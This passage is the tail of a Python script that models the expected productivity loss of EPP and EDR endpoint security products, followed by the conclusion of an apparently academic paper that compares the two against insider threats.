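EFFICIENCY = 1.0            # work-efficiency parameter, set to 1 in the figures
EPP_PROTECT_RATE = 0.993    # R for EPP: 99.3% protection, 0.07% compromise
FP_DOWNTIME_H = 24.0        # hours an endpoint is unusable after a false positive

# Constructed values (assumptions, not on the page)
P_FALSE_POSITIVE = 0.05     # share of EPP detections that are false positives
TRUE_REPORT_HOURS = 1.0     # hours lost handling a correct detection
EPP_OVERHEAD = 0.02         # constant cost of the agent slowing the endpoint
                            # (the paper models this as a constant intercept)


@dataclass(frozen=True)
class State:
    name: str
    probability: float
    loss: float             # fraction of a working day lost in this state


def hours_to_loss(hours: float) -> float:
    """Convert endpoint downtime in hours to lost productivity (fraction of a day)."""
    return EFFICIENCY * hours / WORK_HOURS


def expected_loss(states: List[State], overhead: float = 0.0) -> float:
    """Weighted average of the per-state losses; probabilities must sum to 1."""
    total_p = sum(s.probability for s in states)
    if abs(total_p - 1.0) > 1e-9:
        raise ValueError(f"state probabilities sum to {total_p}, not 1")
    return overhead + sum(s.probability * s.loss for s in states)


def epp_states(t_eliminate_h: float, r: float = EPP_PROTECT_RATE) -> List[State]:
    """EPP: the protection state splits into true report and false positive;
    the remaining 1 - R is the compromise state."""
    return [
        State("true report", r * (1 - P_FALSE_POSITIVE), hours_to_loss(TRUE_REPORT_HOURS)),
        State("false positive", r * P_FALSE_POSITIVE, hours_to_loss(FP_DOWNTIME_H)),
        State("compromise", 1 - r, hours_to_loss(t_eliminate_h)),  # assumed: threat runs for all of t
    ]


def epp_loss(t_eliminate_h: float) -> float:
    return expected_loss(epp_states(t_eliminate_h), overhead=EPP_OVERHEAD)


def phi(r: float) -> float:
    """Proportional reduction of the threat's paralysis time; phi(R) = 1 - R
    follows the paper's stated assumption, with R restricted to [0.5, 1]."""
    if not 0.5 <= r <= 1.0:
        raise ValueError("the paper restricts R for EDR to [0.5, 1]")
    return 1.0 - r


def edr_states(t_eliminate_h: float, r: float) -> List[State]:
    """EDR: protection shortens the paralysis by phi(R); compromise is full paralysis."""
    return [
        State("protection", r, phi(r) * hours_to_loss(t_eliminate_h)),
        State("compromise", 1 - r, hours_to_loss(t_eliminate_h)),
    ]


def edr_loss(t_eliminate_h: float, r: float) -> float:
    return expected_loss(edr_states(t_eliminate_h, r))   # assumed: no slowdown overhead


def crossover_time(r_edr: float) -> Optional[float]:
    """Elimination time t at which the EDR and EPP losses are equal for a given R.

    Both losses are linear in t, so solve epp_intercept + epp_slope*t = edr_slope*t.
    Returns None when EDR is cheaper for every t (its slope never exceeds EPP's).
    """
    epp_intercept = epp_loss(0.0)
    epp_slope = epp_loss(1.0) - epp_intercept
    edr_slope = edr_loss(1.0, r_edr)
    if edr_slope <= epp_slope:
        return None
    return epp_intercept / (edr_slope - epp_slope)


def best_choice(t_eliminate_h: float, r_edr: float) -> str:
    """Pick the product with the lower expected loss at this (t, R) point."""
    return "EDR" if edr_loss(t_eliminate_h, r_edr) < epp_loss(t_eliminate_h) else "EPP"


if __name__ == "__main__":
    for r in (0.8, 0.9, 0.99, 0.999):
        t_star = crossover_time(r)
        if t_star is None:
            print(f"R={r}: EDR is cheaper for every elimination time")
        else:
            print(f"R={r}: EDR is cheaper while t < {t_star:.1f} h, EPP beyond that")
    print("t=10h, R=0.9 ->", best_choice(10.0, 0.9))
```

Because both expected losses are linear in t, crossover_time solves for the boundary in closed form and returns None when EDR's slope never exceeds EPP's, which is the "R approaches 1" case the paper describes. With the constructed parameters, R = 0.9 puts the boundary near t ≈ 12.5 h, so EDR is the better choice at the paper's t = 10 h and EPP beyond the boundary, while R = 0.999 makes EDR preferable for every elimination time.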
VII. CONCLUSION AND FUTURE WORK
There are several methods to defend against insider threats; the most popular and most widely accepted are EPP and EDR. We found that they have different effects in different situations. EPP is good at dealing with external threats. It can effectively protect endpoints through component functions such as HIDS, HIPS, and antivirus, and it can detect and eliminate risks from outside the system itself. EPP certainly has disadvantages as well, which include over-utilization of resources, signature-based detection, and the requirement of an internet connection to run many of its functions. However, the most significant shortcoming is that it cannot defend against the insider threat. Once a virus has infiltrated the internal network, EPP is no longer the right solution.
On the contrary, EDR can do what EPP cannot. EDR is an expert at dealing with the insider threat: it gathers different information and develops its own intelligence to help detect abnormal endpoints and eliminate insider threats. It also overcomes some of EPP's disadvantages, such as occupying too many resources. However, it cannot do what EPP does either. A primary problem of EDR is that it cannot prevent endpoints from being infected. In other words, it does not handle external threats very well, and it cannot monitor what happens on one specific endpoint. Prevention always goes beyond remediation. In some difficult situations, when a virus can infect an endpoint countless times, EDR is not the right solution at all.
In our proposed models, we find that the loss caused by EPP is the least, and that the loss does not increase with the severity of the threat. The reason is that the high detection rate keeps most threats from penetrating the computer in depth. However, since EPP reduces the speed of system operation, it incurs a small loss as soon as it is switched on. Even so, these losses are perfectly acceptable compared to the enormous damage threatened by an intrusion.
Secondly, in the EDR model, we noticed that EDR is the only product that may incur no loss while completely defending against the threat. However, it all depends on the efficiency of the EDR product. EDR has few cleaning mechanisms, so once the active prediction fails and the threat intrudes into the system, it causes severe loss to the whole system. We therefore suggest weighing the pros and cons carefully when choosing EDR products.
Thirdly, which one should be chosen between EPP and EDR? From our final formula, we can see that the effectiveness comparison between EPP and EDR involves two influencing factors: the time needed to eliminate the threat () and the probability that EDR can actively predict the threat (R). We suggest that priority be given to the accuracy of EDR's active defense: if its accuracy approaches 1, or the time needed to clear the virus is very short, the intrusion will not cause significant loss to the enterprise, and the efficiency of EDR will be higher than that of EPP. In other cases, EPP is more efficient than EDR.
However, to analyze the actual effectiveness of EPP and EDR, we had to take many factors into consideration. The success rate of EDR is a crucial element in deciding whether to use this product or not. When the success rate is high and the paralysis time caused by the risk is low, it is better to use EDR. If either of the two conditions does not hold, it is better to choose EPP. Most EDR providers can guarantee a high detection and defense probability, and a company must defend against the threat. We strongly suggest that both products be taken into consideration to ensure the safety and security of a company.
In this paper, we introduced some concepts of EPP and EDR and established a model for each of them, but there are many challenges and flaws that we could not address because of limitations of time, data and resources. Since threats and anti-threat methods are developing rapidly, the following needs to be done in the future:
• All the contents mentioned in this paper need to be updated and supplemented in time.
• We also ran some tests and collected data to verify the accuracy and deviation of our model. There are still many factors that should be taken into consideration in future tests.
• We can improve our model, and help other scholars strengthen their theory as well, if companies release more data about their products.